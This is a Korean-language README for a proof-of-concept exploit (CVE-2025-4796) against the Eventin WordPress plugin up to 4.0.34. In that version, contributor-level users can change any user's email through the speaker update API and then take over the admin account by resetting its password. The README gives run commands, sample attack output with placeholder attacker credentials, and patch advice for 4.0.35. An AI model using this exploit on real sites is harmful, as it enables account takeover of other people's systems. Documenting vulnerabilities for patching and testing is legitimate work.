
eventin <= 4.0.34 - 인증된 contributor+ 사용자의 이메일 변경을 통한 권한 상승 / 계정 탈취
eventin <= 4.0.34 - 인증된 기여자 이상의 사용자 이메일 변경/계정 탈취를 통한 권한 상승
Eventin WordPress 플러그인(<= 4.0.34)에서 발견된 권한 상승 버그로, 기여자 이상의 사용자가 플러그인의 스피커 업데이트 API를 통해 모든 사용자의 이메일을 변경할 수 있습니다. 관리자 이메일을 공격자가 제어하는 이메일로 변경하면 비밀번호를 재설정하고 계정을 탈취할 수 있습니다.
eventin\speaker\api\speakercontroller::update_item)eventin은 업데이트를 요청하는 사용자가 누구인지 또는 사용자 이메일을 변경할 권한이 있는지 제대로 확인하지 않습니다. 기여자 이상의 사용자는 다음 엔드포인트를 호출할 수 있습니다:
요구 사항:
requests 설치:
pip install requests
스크립트를 실행하고 프롬프트가 표시되면 필요한 값을 입력합니다:
python3 CVE-2025-4796.py
[+] SSL 인증 확인 경고 해제 중
[+] WordPress에 로그인 중.
[+] 로그인 성공.
[+] nonce 토큰 가져오는 중
[+] nonce 토큰 발견됨: abcdef1234567890
[+] 스피커 이메일 업데이트 요청
[+] 업데이트 작업 성공.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
eventin 플러그인의 버전 4.0.35에서 패치가 릴리스되었습니다. 사이트 관리자는 즉시 이 버전으로 업데이트할 것을 강력히 권장합니다. 이 수정 사항은 SpeakerController::update_item 함수에 추가 사용자 검증 확인을 포함합니다.